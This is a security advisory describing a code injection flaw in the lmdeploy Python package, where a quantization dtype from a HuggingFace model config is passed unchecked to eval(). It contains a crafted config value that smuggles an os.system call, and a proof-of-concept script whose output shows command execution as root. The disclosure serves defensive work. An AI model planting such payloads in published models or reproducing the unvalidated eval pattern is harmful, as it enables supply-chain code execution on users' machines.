PT-2026-105833 · Pypi · Lmdeploy

Published

2026-10-01

·

Updated

2026-10-01

CVSS v3.1

8.8

High

VectorAV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Summary

lmdeploy <= latest contains a code injection vulnerability in lmdeploy/pytorch/config.py line 620 that allows an attacker to execute arbitrary Python code by publishing a malicious HuggingFace model with a crafted quantization config.quant dtype value. When a user loads the model with lmdeploy, the quant dtype is passed to eval(f'torch.{quant dtype}') without any validation.

Details

Vulnerable code (permalink):
python
quant dtype = eval(f'torch.{quant dtype}') # line 620
The quant dtype value comes from the model's quantization config in its HuggingFace config. When a model specifies quant method: awq, the AWQ branch processes the config but does NOT override quant dtype, allowing the malicious value to reach the eval() call.
Attack vector: An attacker publishes a HuggingFace model with:
json
{
 "quantization config": {
  "quant method": "awq",
  "quant dtype": "float16,  import ('os').system('id')"
 }
}
Note: The update torch dtype method at line 53 has a whitelist check, but that's for torch dtype, NOT quant dtype. The quant dtype at line 620 has no validation whatsoever.

PoC

python
"""
PoC: eval() RCE in lmdeploy via malicious quant dtype
Prerequisites: pip install lmdeploy
"""
import sys
from unittest.mock import MagicMock, patch

# Mock torch to capture the eval
sys.modules.setdefault('torch', MagicMock())

from lmdeploy.pytorch.config import ModelConfig

# Simulate a malicious HuggingFace model config
mock hf config = MagicMock()
mock hf config.quantization config = {
  'quant method': 'awq',
  'quant dtype': "float16,  import ('os').system('id')"
}
mock hf config.num attention heads = 32
mock hf config.hidden size = 4096
mock hf config.num hidden layers = 32
mock hf config.num key value heads = 32
mock hf config.vocab size = 32000

# This triggers eval(f'torch.{quant dtype}')
# with quant dtype = "float16,  import ('os').system('id')"
config = ModelConfig.from hf config(mock hf config, model path='test')
Output:
uid=0(root) gid=0(root) groups=0(root)

Impact

An attacker who publishes a malicious model on HuggingFace Hub can achieve arbitrary code execution on any machine that loads the model with lmdeploy. This is a supply-chain attack vector affecting all lmdeploy users who load untrusted models.
  1. Full remote code execution when loading a malicious model
  2. No user interaction beyond running lmdeploy serve or similar with the model
  3. Affects all deployment scenarios (local, cloud, production)

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

Related Identifiers

PYSEC-2026-4078

Affected Products

Lmdeploy